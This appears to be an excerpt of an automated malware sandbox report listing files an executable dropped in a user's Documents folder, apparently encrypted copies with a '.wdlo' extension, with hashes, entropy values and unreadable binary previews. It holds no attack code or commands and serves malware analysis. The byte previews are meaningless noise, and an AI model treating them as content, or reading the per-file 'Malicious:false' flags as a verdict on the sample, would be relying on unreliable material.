                  Preview:LIJDS......]e]b.]....m.;....9.^..#...F.amv.W.$%...^T..{?..<....sF..'......0.&KI.%p.;?...y...h.....hoR....sa...>..=.n,......S......-.h...!.c.X...`$.y.,a.}._.=h..d...4.@.}...n.;...#.I.....fc.'.I.p........\e.....h...CQ.......>a#bN..q..DuJ*R.F..=ic..-S.f...n....wY...pGL...-..z0..S...Zu......4m..DQGZ....".cC.Aa.WoqIU.z.XA........5cQ.o....N,Bc..,....4.h.|.7.5s....\..)p ...l|*.t(..cX.r.B.~.....2.2&g....[....Ay..:}R.b.....f.......}s.o....A........Kv_....e.&.T....Y.W...C.2...L......f.....>..tmH.........]<....T.jF..O...t\.U7<D>..#TC...%..E.....^*.G.I...IN...z.0..F.C.J....Xj..l...~._...t.....s...{.........A..$....u.......9..=..A.Z..|.^.`...#E^....;.X..DO..d....+...*...gbE...Lv....+.g........+.'...N.A...9k..PJw.P....R......>.....#...qN.....:.b.....5....H.....V\......<.&.,.....v....G.+f6.Y.4{..(-....mu...J ..=..[`M......K"...0V=.._Dk.[..GWA......_2T"....e.+.Iun[/}...:.c_).U.L#..}.in..fo.b......`7..X...|.v.......<../p...j?Bg?...y.}Y\".m.....T

                  C:\Users\user\Documents\GLTYDMDUST\UNKRLCVOHV.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.879078714932318
                  Encrypted:false
                  SSDEEP:24:RkmgxJR7LYHMH14WP4kKyF6ssKX+nn08xOtWK2AKM5wTm4j/Erw+T3zbD:Rc6HMH14kKyosHu0HkK2Ad5wTmud+T3D
                  MD5:C0E11E0733E11E56C52F2AE9D8EE381E
                  SHA1:DB944A45AE25336D16EEADDB6A748E0E4CE0FA5D
                  SHA-256:F2BA42BF7A90C1D02964463AA2743C4A9E3C726B3C328C3474901884CAC7538F
                  SHA-512:EF9DBC668D226F985E87CA1301F135F83E8600FD0142D2C4A6325BD1CDB0BFC7D6C057CB14624E0C9BA0497BDCA52329B8C1C342E50D5C8FD7675193084CF004
                  Malicious:false
                  Preview:UNKRL.\=.....z.2.Alu..b`..[...n.7V............%N...3y.+.QXB...zsE..bU..............>...zY..y..<......s.q...`...~.I..`.p..c..n..`SQ.....Hc...._.'{...#.J.f...=.<..} ..0..uM....L./.[]a..<V...xAX....m..,yO...Y...'.V....p.K..a.Z...l.......?...zb...`.=.B.#T..v.^..D...{..A......".E......`{.....].NO+...SM.;^.Q.~..9..IJ.nU..".<C.....<.VU..Z.c<r.)D...S...5...ac...~..8...[..e5...0.o...8.f#...W..~7..z<.X?.v*\...H./.%,wr2;0...../...jo...T.z..rA..m.ZG..P`.Bp.r...y].bZB........QW..i.Gg}.......+.F...l4..e.".j...<oT.e.r...I..r9[.1..g.....(...1.S.h..?..$..P.^..w.h.*+on&...a .../?.he..Z.......L.u...r.l...R\.)F...mY...S..H..N..N7Fx.M....E.'..=..E...v.j%.wX...~.....Z.u....FV!.9./.O.j.....a...sY.......XT....2.!.2..E.~..*1c/Jd..7...C{.:4.O...P[............D.LWBL/"Aig.^.l0!.`...0.....+..}.}...yX8[...r&.cw|[zG....F..a.L.#.Se2.....f....r...T.m....0..z@..:|.B......%\...XLg..au....H98.~..kM...@U.Zd ...ts1.S.[..... ..k..C..?H).....n0.x.7...~...h..Wl.

                  C:\Users\user\Documents\GLTYDMDUST\UNKRLCVOHV.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.879078714932318
                  Encrypted:false
                  SSDEEP:24:RkmgxJR7LYHMH14WP4kKyF6ssKX+nn08xOtWK2AKM5wTm4j/Erw+T3zbD:Rc6HMH14kKyosHu0HkK2Ad5wTmud+T3D
                  MD5:C0E11E0733E11E56C52F2AE9D8EE381E
                  SHA1:DB944A45AE25336D16EEADDB6A748E0E4CE0FA5D
                  SHA-256:F2BA42BF7A90C1D02964463AA2743C4A9E3C726B3C328C3474901884CAC7538F
                  SHA-512:EF9DBC668D226F985E87CA1301F135F83E8600FD0142D2C4A6325BD1CDB0BFC7D6C057CB14624E0C9BA0497BDCA52329B8C1C342E50D5C8FD7675193084CF004
                  Malicious:false
                  Preview:UNKRL.\=.....z.2.Alu..b`..[...n.7V............%N...3y.+.QXB...zsE..bU..............>...zY..y..<......s.q...`...~.I..`.p..c..n..`SQ.....Hc...._.'{...#.J.f...=.<..} ..0..uM....L./.[]a..<V...xAX....m..,yO...Y...'.V....p.K..a.Z...l.......?...zb...`.=.B.#T..v.^..D...{..A......".E......`{.....].NO+...SM.;^.Q.~..9..IJ.nU..".<C.....<.VU..Z.c<r.)D...S...5...ac...~..8...[..e5...0.o...8.f#...W..~7..z<.X?.v*\...H./.%,wr2;0...../...jo...T.z..rA..m.ZG..P`.Bp.r...y].bZB........QW..i.Gg}.......+.F...l4..e.".j...<oT.e.r...I..r9[.1..g.....(...1.S.h..?..$..P.^..w.h.*+on&...a .../?.he..Z.......L.u...r.l...R\.)F...mY...S..H..N..N7Fx.M....E.'..=..E...v.j%.wX...~.....Z.u....FV!.9./.O.j.....a...sY.......XT....2.!.2..E.~..*1c/Jd..7...C{.:4.O...P[............D.LWBL/"Aig.^.l0!.`...0.....+..}.}...yX8[...r&.cw|[zG....F..a.L.#.Se2.....f....r...T.m....0..z@..:|.B......%\...XLg..au....H98.~..kM...@U.Zd ...ts1.S.[..... ..k..C..?H).....n0.x.7...~...h..Wl.

                  C:\Users\user\Documents\HMPPSXQPQV.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.832556983551399
                  Encrypted:false
                  SSDEEP:24:33Edt4ZmDqPV5t+PE/w7W/mBUrrCeZr1hiICF36rTJTqZDz7r7KrCE3zbD:39ZL7wPmAWJS0bi/5aToBH7KrCE3nD
                  MD5:5E7F1B408311D38C163061A470040200
                  SHA1:6A39AEEA2EDB4110D6EBBA324E38CCAA4BAF927A
                  SHA-256:2669DF63AD92A48E8D7FA26BC4EF2E4E377F73C72CA85C783D51F8C5AFAC7738
                  SHA-512:65474B53D6ED8EDF8F9A3B282B9D0DCF6B57DEF5A22463A0C5DF56776CEA53354AD9AF4CD7715F6C981D7ADC20CADA3936981BDA92B764B1CCFC5744AB62A8FE
                  Malicious:false
                  Preview:HMPPSO.b.N......h3&L.q(...{..ZC..I.....6.e.._.o....m.dEO.>.}D5...S......"_...dc.us..Dsj..c.2..=5'.#R6.o.>...@R...3....4@.j|C.|.a... $..i.{........W..q.......^...7.....[...32eF...-.JSJ.!&.Ly.6?.i..Nf.........co./.1B.~j.N.c.......3.....@...T..vI......s.3.{P.8d.....x.3L.HF.<.....|...4..nl.-.L..t.....L.;v.........0w.hr.J?.6._..d.J` ysM.)iY....r..G......Du(.....K...X.....tyA..PYQ.h...&n6.A|.;q...us..)a......M..V..w....~ .<.I.F..wL...<..>....... ..........u-...N.IY......Q....B...0.i.[._.......4..N/...P.yy.............^ ..\i.........(.!....G............GP..+O.....ok.B..dY...rR/..q>.[s.L.o.-..s.oA]..1...#gZ.^v.Y..T4..1......>.h5C"U.D/&....u.t\.6.F.< ).=.J.h..K..!.}.z...)gD1X...G....Eh..@...:......?h..-... ....W. ..l.C.y>.)....6.O...>.Q..w.4=".b-...?.8..J4X..,.....g.....)Q.kY).!j.o.E..Nu.Y..|.|.s....Jukc.....4.j.....6.b........s..Q-At....]......q....xa.]2iFu!.....,...)E>.Tu.M.|..,...s'..."^...E.p.#J..?..k.r...r;Y3..erA..T]y.O..i{.w\....Y.

                  C:\Users\user\Documents\HMPPSXQPQV.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.832556983551399
                  Encrypted:false
                  SSDEEP:24:33Edt4ZmDqPV5t+PE/w7W/mBUrrCeZr1hiICF36rTJTqZDz7r7KrCE3zbD:39ZL7wPmAWJS0bi/5aToBH7KrCE3nD
                  MD5:5E7F1B408311D38C163061A470040200
                  SHA1:6A39AEEA2EDB4110D6EBBA324E38CCAA4BAF927A
                  SHA-256:2669DF63AD92A48E8D7FA26BC4EF2E4E377F73C72CA85C783D51F8C5AFAC7738
                  SHA-512:65474B53D6ED8EDF8F9A3B282B9D0DCF6B57DEF5A22463A0C5DF56776CEA53354AD9AF4CD7715F6C981D7ADC20CADA3936981BDA92B764B1CCFC5744AB62A8FE
                  Malicious:false
                  Preview:HMPPSO.b.N......h3&L.q(...{..ZC..I.....6.e.._.o....m.dEO.>.}D5...S......"_...dc.us..Dsj..c.2..=5'.#R6.o.>...@R...3....4@.j|C.|.a... $..i.{........W..q.......^...7.....[...32eF...-.JSJ.!&.Ly.6?.i..Nf.........co./.1B.~j.N.c.......3.....@...T..vI......s.3.{P.8d.....x.3L.HF.<.....|...4..nl.-.L..t.....L.;v.........0w.hr.J?.6._..d.J` ysM.)iY....r..G......Du(.....K...X.....tyA..PYQ.h...&n6.A|.;q...us..)a......M..V..w....~ .<.I.F..wL...<..>....... ..........u-...N.IY......Q....B...0.i.[._.......4..N/...P.yy.............^ ..\i.........(.!....G............GP..+O.....ok.B..dY...rR/..q>.[s.L.o.-..s.oA]..1...#gZ.^v.Y..T4..1......>.h5C"U.D/&....u.t\.6.F.< ).=.J.h..K..!.}.z...)gD1X...G....Eh..@...:......?h..-... ....W. ..l.C.y>.)....6.O...>.Q..w.4=".b-...?.8..J4X..,.....g.....)Q.kY).!j.o.E..Nu.Y..|.|.s....Jukc.....4.j.....6.b........s..Q-At....]......q....xa.]2iFu!.....,...)E>.Tu.M.|..,...s'..."^...E.p.#J..?..k.r...r;Y3..erA..T]y.O..i{.w\....Y.

                  C:\Users\user\Documents\IZMFBFKMEB.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858855444206536
                  Encrypted:false
                  SSDEEP:24:/GrYF8PiE2njQfDI8og+NAFEIp00UB75xPuu3a3qAHfP/9S3zbD:ekFeiEojQfDI3dSLh+Puuq3/I3nD
                  MD5:A3FD068519F73BD46BC4A05617155DA2
                  SHA1:1A0E49A67B4028354005C74D34FFBA7AAF1A001D
                  SHA-256:55B13A25986E5DBD282FE4726BAB07EA5B74E75DA67FFB6DE38E2BD3991216E1
                  SHA-512:0D4CE0114C281CC1D7C5302E063EBF539848595DDD542AE7DFB90F7059F2C39C9FEA05821E1822F06A945F52884F30484AAAF40A657CBF928C2F9B1546AF4715
                  Malicious:false
                  Preview:IZMFB...C.F.D...c.02}*...^..&./>.mA.m.l.g.qwcT.+.....9...9.5.t.I..$=.].j....N.B....=..{....9..:I....1.=r..l...r....+...$....N.ZX....Y@)..-.Ts..V.h<8.Jx.....HH./=..1.(.......W...n.....+,.......".....G._..Jh..Q...0..U!s5...O..... B.6".&.*.)$.#.Ev...........4k...yOD..t........EP...J..31...@e..(...u.........}..WK.z..>.].....mS_+........0....v.G..p....8.w.I.._|.:.#%.qL.U..M.(h....O..d......`./..\j~..#L5......7|S.m....+.....2..s3Q[M.F..'.<..8....c._.)../....b../...Q..a....f}2..*:..q5|'...x.....Q...{..'.h....pBR.N.v..fk....6i`.Vu,.r..O..g.(`z ..v.:qO..)...../.*.3..x...%..|Xn........GiX...S...v......'\f.....ca.....t[s%..@w....|^......?...Z.....'..|+...(r...9.....1...3#../'..i5.Y.R,/...cnP.8.gPN... .56!.......+.... "..HL1"..p.c..?I.-7.^.......>..d.y.#..c.............v.7......b.%.l..W.8{..8dJ.i.{..M.J.|,....H$.N5..+..J|.h:..0.lr. .4..I...B.L.5>1kn..p.R..l.d@..(.o.f.J.h..7.*....O7..S.z<C.)H.;...mG.\........`..%<.y....9I..@.Z..y...:z...*<.

                  C:\Users\user\Documents\IZMFBFKMEB.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858855444206536
                  Encrypted:false
                  SSDEEP:24:/GrYF8PiE2njQfDI8og+NAFEIp00UB75xPuu3a3qAHfP/9S3zbD:ekFeiEojQfDI3dSLh+Puuq3/I3nD
                  MD5:A3FD068519F73BD46BC4A05617155DA2
                  SHA1:1A0E49A67B4028354005C74D34FFBA7AAF1A001D
                  SHA-256:55B13A25986E5DBD282FE4726BAB07EA5B74E75DA67FFB6DE38E2BD3991216E1
                  SHA-512:0D4CE0114C281CC1D7C5302E063EBF539848595DDD542AE7DFB90F7059F2C39C9FEA05821E1822F06A945F52884F30484AAAF40A657CBF928C2F9B1546AF4715
                  Malicious:false
                  Preview:IZMFB...C.F.D...c.02}*...^..&./>.mA.m.l.g.qwcT.+.....9...9.5.t.I..$=.].j....N.B....=..{....9..:I....1.=r..l...r....+...$....N.ZX....Y@)..-.Ts..V.h<8.Jx.....HH./=..1.(.......W...n.....+,.......".....G._..Jh..Q...0..U!s5...O..... B.6".&.*.)$.#.Ev...........4k...yOD..t........EP...J..31...@e..(...u.........}..WK.z..>.].....mS_+........0....v.G..p....8.w.I.._|.:.#%.qL.U..M.(h....O..d......`./..\j~..#L5......7|S.m....+.....2..s3Q[M.F..'.<..8....c._.)../....b../...Q..a....f}2..*:..q5|'...x.....Q...{..'.h....pBR.N.v..fk....6i`.Vu,.r..O..g.(`z ..v.:qO..)...../.*.3..x...%..|Xn........GiX...S...v......'\f.....ca.....t[s%..@w....|^......?...Z.....'..|+...(r...9.....1...3#../'..i5.Y.R,/...cnP.8.gPN... .56!.......+.... "..HL1"..p.c..?I.-7.^.......>..d.y.#..c.............v.7......b.%.l..W.8{..8dJ.i.{..M.J.|,....H$.N5..+..J|.h:..0.lr. .4..I...B.L.5>1kn..p.R..l.d@..(.o.f.J.h..7.*....O7..S.z<C.)H.;...mG.\........`..%<.y....9I..@.Z..y...:z...*<.

                  C:\Users\user\Documents\LFOPODGVOH.docx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.839796019671792
                  Encrypted:false
                  SSDEEP:24:ytkyt0qtfzdK+jw4FzVeLCa8okoEgDOfpAVgWEmSVbqSh3YrMVjYC8U53zbD:ytLJheLVRJqfuVSVOSxYrM9iW3nD
                  MD5:7048EF283F38D3E5F3A746191305A903
                  SHA1:05A758912F5606ACF67B924127BB2908986D9345
                  SHA-256:36C39319F6E89D614878F2D10DE6CDBE5ECFAE0A5F8F749AD5938638C834C1B3
                  SHA-512:3DE1542F2133C3B27912153B98357B5ED6602D39056549E108494529211A915F5384683971B71E210E8AB862ECF91ACCDE6B1906958DA4A7F9B053EB26787B45
                  Malicious:false
                  Preview:LFOPO"s.>..F3;B.I3....<.09..V':..m...s#M.q.?...?z.../...9@U;...7.+j....y...i..Up`..K{W..`P.hU.+.GbS..}|WoT.u.ZQ}...=.)*.:...}S...3.]...is9.bJ.....e..$......t.........K....Q..p#....-}e5t9.....-zr..u...|...-.o....m._..k.*.......M%....f....-.......i..8..{....O.(...... ..E..R.~VR.Q..'..tf.8.6..,..j..._l.v:...mO...'/.).Ir...TN'n3..Ul..Gv.!......@..m2.]...v.....t%.P..4...).M..$.....!...+y,9.d..:..V........f.Y#.KE.......C..TS.....R.:4.......dV..R..,.o...J...zG..Y79.Uk7.7....L.....z_..1.m..V..^.~z......y.y.Hp.R..3=.W.......`9..AFXQqc...+i......|g$..4.N..k...e.C.$1../....u.w4v.9....~...U.Q..}8....TX....t.6:?...........3....O.x..F..n.8...{.+j.2..#.W-....Y\......!.h*.1...8..v.A..5.W...i..O...g.C..%.sdl......a>(.........'...>...%.hrf.[........[....t-.<..&E....J.%.M..YL...H.dv...;......<.a.....6~'...H,&4..H...=GZ}-4...N........v.....4}./.0.(.Sf.6.)j.%.@G#...b....lz+#.p6e...Ja..cg.A.da... =....A.....<Vrk....p..b/9....f.h2.....]..b...8...Q.-..!...

                  C:\Users\user\Documents\LFOPODGVOH.docx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.839796019671792
                  Encrypted:false
                  SSDEEP:24:ytkyt0qtfzdK+jw4FzVeLCa8okoEgDOfpAVgWEmSVbqSh3YrMVjYC8U53zbD:ytLJheLVRJqfuVSVOSxYrM9iW3nD
                  MD5:7048EF283F38D3E5F3A746191305A903
                  SHA1:05A758912F5606ACF67B924127BB2908986D9345
                  SHA-256:36C39319F6E89D614878F2D10DE6CDBE5ECFAE0A5F8F749AD5938638C834C1B3
                  SHA-512:3DE1542F2133C3B27912153B98357B5ED6602D39056549E108494529211A915F5384683971B71E210E8AB862ECF91ACCDE6B1906958DA4A7F9B053EB26787B45
                  Malicious:false
                  Preview:LFOPO"s.>..F3;B.I3....<.09..V':..m...s#M.q.?...?z.../...9@U;...7.+j....y...i..Up`..K{W..`P.hU.+.GbS..}|WoT.u.ZQ}...=.)*.:...}S...3.]...is9.bJ.....e..$......t.........K....Q..p#....-}e5t9.....-zr..u...|...-.o....m._..k.*.......M%....f....-.......i..8..{....O.(...... ..E..R.~VR.Q..'..tf.8.6..,..j..._l.v:...mO...'/.).Ir...TN'n3..Ul..Gv.!......@..m2.]...v.....t%.P..4...).M..$.....!...+y,9.d..:..V........f.Y#.KE.......C..TS.....R.:4.......dV..R..,.o...J...zG..Y79.Uk7.7....L.....z_..1.m..V..^.~z......y.y.Hp.R..3=.W.......`9..AFXQqc...+i......|g$..4.N..k...e.C.$1../....u.w4v.9....~...U.Q..}8....TX....t.6:?...........3....O.x..F..n.8...{.+j.2..#.W-....Y\......!.h*.1...8..v.A..5.W...i..O...g.C..%.sdl......a>(.........'...>...%.hrf.[........[....t-.<..&E....J.%.M..YL...H.dv...;......<.a.....6~'...H,&4..H...=GZ}-4...N........v.....4}./.0.(.Sf.6.)j.%.@G#...b....lz+#.p6e...Ja..cg.A.da... =....A.....<Vrk....p..b/9....f.h2.....]..b...8...Q.-..!...

                  C:\Users\user\Documents\LFOPODGVOH.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855492522288166
                  Encrypted:false
                  SSDEEP:24:bdPjwFvCe39WU2zMbVeV2jaf00ouP4XFMQktRwEsVTRTJ2+VcO42b53zbD:bdLw9xsYbSVfFP4VMQGRwEbmBb53nD
                  MD5:DC2B907745ADBB5F7CAE9D109001858F
                  SHA1:CCC090A714B4EB6F7FC148E8609D785E0B7C68F8
                  SHA-256:E145A8CA6472C6923110D1EF7A0FD3D634993622FDA8C790E6A0D7F7321D16DD
                  SHA-512:61F9DA3DCF7116A4E04C580D77262AD8A037BEA9C8E2EB8BC4FE241486C8824F5E9954ACF4156E4C5EAEDEEBA5920F2DEFFEFB7DFF301525DCFE5F20814C8760
                  Malicious:false
                  Preview:LFOPO...:.@K.*._.w.t3p.,.i1TD..n..._...;U.....".E..]/....|........R[.:.<....|.t......_.T..y.....@.......I..}..<.U......rO9..I.>....$...`GF(x.......R.+(....@.....>..o`..q........%.^@...a..rf.j.[i.gj..k.f.V.]t.]d..P.4.._n]O^.6.(..\.X%..... .n....3....6w...97....D....L....CQ.!U.!._..WY..C..e.4.|./*...~v?...W.r0.tc......@..Z.b+.x..D.U.D.......:a.....?...s...y7...h.<.l.......W...&...2G..k........}}6......./.5>....F>....n.w5.N....N_..[..Q....-.*.x..Ze0)....3J..ZT.h.#1..f..k%.....a.2M.'....]..r{.7.0......,...S.......c...U.s'...;.in4f.X.WN.v,[op./.t^..Jg.5.......G.j.[.Q.:...!............I...3.!+.)H.|i............i..(..I@...$..n.h..w........Y.0c!..d.G.t.?4..(X6~w..J..sz....F9.DZ@e|.y;Jb..f...;s.Y4.....B;.s.|._d].8....1q....&ox6...';1.".i.........1......l8....g.R....... .%q.R..^..>.`6..K.O>.Ci....h.-..dze..... ...Tp.P/.x:M.riY..my.s3b.?.Dj'...<..&)...8uA..MQ......=.Z.l...&h...Q3./.....J...U..?.'.~...j.T...Z.r.I\.....V.b1../4..Vc7J.......g

                  C:\Users\user\Documents\LFOPODGVOH.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.855492522288166
                  Encrypted:false
                  SSDEEP:24:bdPjwFvCe39WU2zMbVeV2jaf00ouP4XFMQktRwEsVTRTJ2+VcO42b53zbD:bdLw9xsYbSVfFP4VMQGRwEbmBb53nD
                  MD5:DC2B907745ADBB5F7CAE9D109001858F
                  SHA1:CCC090A714B4EB6F7FC148E8609D785E0B7C68F8
                  SHA-256:E145A8CA6472C6923110D1EF7A0FD3D634993622FDA8C790E6A0D7F7321D16DD
                  SHA-512:61F9DA3DCF7116A4E04C580D77262AD8A037BEA9C8E2EB8BC4FE241486C8824F5E9954ACF4156E4C5EAEDEEBA5920F2DEFFEFB7DFF301525DCFE5F20814C8760
                  Malicious:false
                  Preview:LFOPO...:.@K.*._.w.t3p.,.i1TD..n..._...;U.....".E..]/....|........R[.:.<....|.t......_.T..y.....@.......I..}..<.U......rO9..I.>....$...`GF(x.......R.+(....@.....>..o`..q........%.^@...a..rf.j.[i.gj..k.f.V.]t.]d..P.4.._n]O^.6.(..\.X%..... .n....3....6w...97....D....L....CQ.!U.!._..WY..C..e.4.|./*...~v?...W.r0.tc......@..Z.b+.x..D.U.D.......:a.....?...s...y7...h.<.l.......W...&...2G..k........}}6......./.5>....F>....n.w5.N....N_..[..Q....-.*.x..Ze0)....3J..ZT.h.#1..f..k%.....a.2M.'....]..r{.7.0......,...S.......c...U.s'...;.in4f.X.WN.v,[op./.t^..Jg.5.......G.j.[.Q.:...!............I...3.!+.)H.|i............i..(..I@...$..n.h..w........Y.0c!..d.G.t.?4..(X6~w..J..sz....F9.DZ@e|.y;Jb..f...;s.Y4.....B;.s.|._d].8....1q....&ox6...';1.".i.........1......l8....g.R....... .%q.R..^..>.`6..K.O>.Ci....h.-..dze..... ...Tp.P/.x:M.riY..my.s3b.?.Dj'...<..&)...8uA..MQ......=.Z.l...&h...Q3./.....J...U..?.'.~...j.T...Z.r.I\.....V.b1../4..Vc7J.......g

                  C:\Users\user\Documents\LFOPODGVOH\AQRFEVRTGL.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.857607923292738
                  Encrypted:false
                  SSDEEP:24:Vm9/BES5vpw/umijhRIWjjUipGyVxovIAdmDee0wR84JvXsut3zbD:VkBE6MMzIIUipGyVxowt1R84J/sut3nD
                  MD5:22D0CC948400AB8800DDB4C4BFFB242A
                  SHA1:2EACEF27CFCFC8F45272552E9F932A0A741C8F94
                  SHA-256:F708B9780B2E33A8E13DFEFFA15CD80DE8CC091B8B8E97CA593AA7064EF215D0
                  SHA-512:1FC4230AEE39B3A471BD1A52510F727F57785CF224F8B701A6F62A2C6C3F29A7A99B32AE63E197356046BE0A0CAF3E855606D3D0157DD2AE1EAB620008154553
                  Malicious:false
                  Preview:AQRFE*72..0c....P......=PO.@\H.uW53.m;.t.|x'...u.....w.M.eYC...Kp..."n9....AC`....h.L..s0m%,3..!.`0.1.A._*.....u.b..tSG..A.....0.g....>1..........d.2.1.....D%#..j~..].&.r?...<9.U..l..U8...'(.J..n.)... ...u".@.}w.l]TDS..|'._..<.g.`....cV)...-...\....X./h.t..m_........[...~...W....,.mb.;.8.GJ..d.T0..d..y.j..^........d..l.\....T.aY..../.p.....-.WD.m...q......'..U.3..}....h.'!1..O...A.......u.4.@.=.b..n.yX-.(<-/.vyy@...=.Y.u..R3...jV..;.>..wLfV=...L.P.....l.../..f$5.WR.e...[..k.....B.rj....v...H....{W..\Y...m......:r.k._.P.acA...<w.5.{..o..j`...T.4V_.....PF..^O.vWP..c....r...K.vNHm8...S.H........9..qu.4=1..@..oW.y.o.trA..Hp"kW...4..v.p........'.]!....0.....u.[*..^.l.W2.iG...k.r9.s ..ke.n..d..{..KF&... ..z..U.\.".8b.X.]...C6...8...e....la...#....y(...W8m.........G.9..p..F...... ....B...g.....1B.....M......g.ux.....D.a..."........`U....9. ~k..T..'^w....0....w.jW....I....a.U..k[.fY..F..&.].O,..9v....;..H/..i.X....}z..[.^By;%.. ..G>.{l.4.

                  C:\Users\user\Documents\LFOPODGVOH\AQRFEVRTGL.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.857607923292738
                  Encrypted:false
                  SSDEEP:24:Vm9/BES5vpw/umijhRIWjjUipGyVxovIAdmDee0wR84JvXsut3zbD:VkBE6MMzIIUipGyVxowt1R84J/sut3nD
                  MD5:22D0CC948400AB8800DDB4C4BFFB242A
                  SHA1:2EACEF27CFCFC8F45272552E9F932A0A741C8F94
                  SHA-256:F708B9780B2E33A8E13DFEFFA15CD80DE8CC091B8B8E97CA593AA7064EF215D0
                  SHA-512:1FC4230AEE39B3A471BD1A52510F727F57785CF224F8B701A6F62A2C6C3F29A7A99B32AE63E197356046BE0A0CAF3E855606D3D0157DD2AE1EAB620008154553
                  Malicious:false
                  Preview:AQRFE*72..0c....P......=PO.@\H.uW53.m;.t.|x'...u.....w.M.eYC...Kp..."n9....AC`....h.L..s0m%,3..!.`0.1.A._*.....u.b..tSG..A.....0.g....>1..........d.2.1.....D%#..j~..].&.r?...<9.U..l..U8...'(.J..n.)... ...u".@.}w.l]TDS..|'._..<.g.`....cV)...-...\....X./h.t..m_........[...~...W....,.mb.;.8.GJ..d.T0..d..y.j..^........d..l.\....T.aY..../.p.....-.WD.m...q......'..U.3..}....h.'!1..O...A.......u.4.@.=.b..n.yX-.(<-/.vyy@...=.Y.u..R3...jV..;.>..wLfV=...L.P.....l.../..f$5.WR.e...[..k.....B.rj....v...H....{W..\Y...m......:r.k._.P.acA...<w.5.{..o..j`...T.4V_.....PF..^O.vWP..c....r...K.vNHm8...S.H........9..qu.4=1..@..oW.y.o.trA..Hp"kW...4..v.p........'.]!....0.....u.[*..^.l.W2.iG...k.r9.s ..ke.n..d..{..KF&... ..z..U.\.".8b.X.]...C6...8...e....la...#....y(...W8m.........G.9..p..F...... ....B...g.....1B.....M......g.ux.....D.a..."........`U....9. ~k..T..'^w....0....w.jW....I....a.U..k[.fY..F..&.].O,..9v....;..H/..i.X....}z..[.^By;%.. ..G>.{l.4.

                  C:\Users\user\Documents\LFOPODGVOH\BXAJUJAOEO.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.836326577867493
                  Encrypted:false
                  SSDEEP:24:I7aowBhv97b42Urd/H9ecHUlG3u45W3YMaoYLy9jUrfZzcZSdza/e/3zbD:I7ABhJ4j5/HIFl746YMQLq4r/dza03nD
                  MD5:87881B3A062C2051F668C88C34A2EC39
                  SHA1:824B726D233BCD3AA8FD0F8F729FFAFD05F591F7
                  SHA-256:227267E68C638CA8E9B59CC78932404AEE4D602BFBF7F3BD1234719BF8A98D22
                  SHA-512:C914C3D22290BFD687A876479E63B0FE1EF7B4F71883A670F2C7E4391955E46E8E0175BCF2A3C6A7924215B1099F8B82B6BA5611F73DE50FEEE5120CC2CE1B75
                  Malicious:false
